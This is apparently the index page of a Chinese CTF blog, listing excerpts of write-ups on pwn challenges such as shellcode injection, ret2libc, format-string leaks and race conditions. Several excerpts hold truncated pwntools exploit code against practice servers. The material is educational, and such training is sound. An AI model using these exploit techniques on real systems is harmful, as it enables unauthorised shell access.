avatar
Articles
29
Tags
7
Categories
8
Home
Blog
  • categories
  • tags
  • archives
Live
  • shuoshuo
  • photos
  • music
  • movies
Links
Comment
About
Star
Search
Home
Blog
  • categories
  • tags
  • archives
Live
  • shuoshuo
  • photos
  • music
  • movies
Links
Comment
About

Star

XYNU2024信安杯
Created2025-08-24|比赛|ctf
全是简单题目,直接上exp NC直接nc连接,然后ls+cat flag即可。 shellcodefrom pwn import*context.arch='amd64'io=remote('gz.imxbt.cn',20029)shellcode=asm(shellcraft.sh())io.sendline(shellcode)io.interactive() ret2libcfrom pwn...
ctfshow-pwn入门
Created2025-08-24|pwn|ctf
Test_your_ncpwn0 pwn1 发现nc连接后可以直接获得flag。 pwn2 发现直接给了我们shell,只需要nc连接后并执行cat /ctfshow_flag命令即可获得flag。 pwn3 程序本身很简单,就是找到哪个函数能够获得flag。 直接选6即可获得flag。 但是在这里有一个迷惑选项4,就是echo /ctfshow_flag命令。 echo命令:是Linux系统中的一个基础命令,用于在终端输出文本或变量值,常用于脚本中显示信息、调试或生成文件。常用选项:-n 不换行;-e 启用转义字符解释。高级用法:使用重定向将输出保存到文件,如echo “aaaa” > output.txt;追加内容到文件,如echo “aaaa” >>...
0xGame2024-复现
Created2025-08-23|比赛|ctf
where_is_my_binsh 一道简单的题目,存在栈溢出以及system函数,没有/bin/sh\x00字符串,给了变量something的地址,那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=ELF('./where_is_my_binsh')bin_sh=0x0404090system=elf.sym['system']ret=0x040101ardi=0x0401323io.sendlineafter('If you want it ,then you have to create...
2025_SWPU_NSSCTF_秋季招新训练赛
Created2025-08-03|比赛|ctf
口算题卡一道计算题,主要考察脚本的编写,但因为没有时间限制,所以可以直接算100道题。 from pwn import*s = lambda buf: io.send(buf)sl = lambda buf: io.sendline(buf)sa = lambda delim, buf: io.sendafter(delim, buf)sal = lambda delim, buf: io.sendlineafter(delim, buf)r = lambda n=None: io.recv(n)ra = lambda t=tube.forever: io.recvall(t)ru = lambda delim: io.recvuntil(delim)rl = lambda: io.recvline()rls = lambda n=2**20: io.recvlines(n)su = lambda buf,addr: io.success(buf + "==>" + hex(addr))io =...
nepctf2025
Created2025-08-01|比赛|ctf
time 本题可以任意文件读取但会检测不能存在flag,使用pthread执行文件内容读取函数。本题主要考察了格式化字符串漏洞以及多线程条件竞争漏洞。 首先由于本题存在格式化字符串漏洞,因此可以利用该漏洞泄漏flag,于是得知道偏移量是多少。 若直接使用gdb.attach(io,’b *$rebase(0x2D08)’)会发现无法触发断点,是因为gdb尝试脱离父进程并附加子进程,就会无法调试父进程,此时可以set follow-fork-mode parent,使gdb始终保持对父进程的附加调试。 可以看出偏移量为22,那么就可以使用%22$p-%23$p-%24$p-%25$p-%26$p-%27$p-%28$p-%29$p泄漏flag。 接着就是条件竞争绕过对flag的检查,因为每次输入文件名后并不是直接执行start_routine函数,而是通过 pthread_create函数创建新的线程执行,那么这里存在时间竞争漏洞,我们先输入合法的文件名绕过检查,接着...
Polarctf2025夏季赛
Created2025-06-08|比赛|ctf
flow 这题主要考了一个整数溢出, unsigned __int8 n9的取值范围是0-255,因此我们可以输入长度为257的字符串使得n9的值绕过if判断,在这里需要了解python中ljust的使用。 Python ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。如果指定的长度小于原字符串的长度则返回原字符串。即若代码为 str="aaaa"print(str.ljust(50,b'0')) 那么会打印出aaaa0000…000,因此就可以优化脚本的编写。exp如下: from pwn...
2025日常琐事
Created2025-05-21|daily|daily
...
2025SQCTF
Created2025-04-12|比赛|ctf
很荣幸参加了第四届SQCTF,作为新生赛,难度还可以,因为本人能力还不够,并没能够akpwn,还得再努力努力(毕竟是想打XCTF的,这点实力是肯定不行的。 浅红欺醉粉,肯信有江梅一道简单到不能再简单的nc签到题。 领取你的小猫娘这是一道64位的题,基本没开什么保护。 这里可以看到有一个后门函数,其判断条件为v5的值为真,因为我们能输入的是v4,而且观察栈上结构可以知道地址相差0x50-4。所以可以通过输入覆盖到v5并将v5的值变为真即可。 from pwn...
Polarctf2025春季赛
Created2025-03-23|比赛|ctf
koi经过file我们可以知道是一个64位文件,然后checksec发现它开启了一个NX保护,放进IDA看看。 发现主函数中有4个子函数,依次点进发现wrshell()函数与xxx()函数存在栈溢出。 再通过主函数我们可以分析出,需要当V4==520且n==520时,才会调用xxx()函数,因此需要修改n的值。这里我想的是栈迁移,进入wrshell函数,通过read进行溢出将rbp的地址覆盖成n的地址,将n的值改成520,接着就可以进入xxx()函数,再通过puts泄漏libc,最后再read进行栈溢出将返回地址覆盖,获取shell(需注意的是调用了scanf函数,会造成偏移,因此我们需要将偏移抵消)。exp如下: from pwn...
123
avatar
Star
Articles
29
Tags
7
Categories
8
Follow Me
Announcement
This is my Blog
Recent Posts
LilCTF2025_ret2all2025-11-06
MoeCTF_20252025-11-05
第十六届极客大挑战2025-11-01
2025_NSSCTF秋季招新赛2025-10-31
Question_CTF_20252025-10-22
Categories
  • C++1
  • daily1
  • pwn3
  • shellcode1
  • test1
  • 函数1
  • 比赛20
  • 系统调用号1
Tags
ctfC++dailytestshellcode函数系统调用号
Archives
  • November 2025 3
  • October 2025 5
  • September 2025 10
  • August 2025 7
  • June 2025 1
  • May 2025 1
  • April 2025 1
  • March 2025 1
Website Info
Article Count :
29
Unique Visitors :
Page Views :
Last Update :
©2025 By Star
Framework Hexo 7.3.0|Theme Butterfly 5.3.5
Search
Loading Database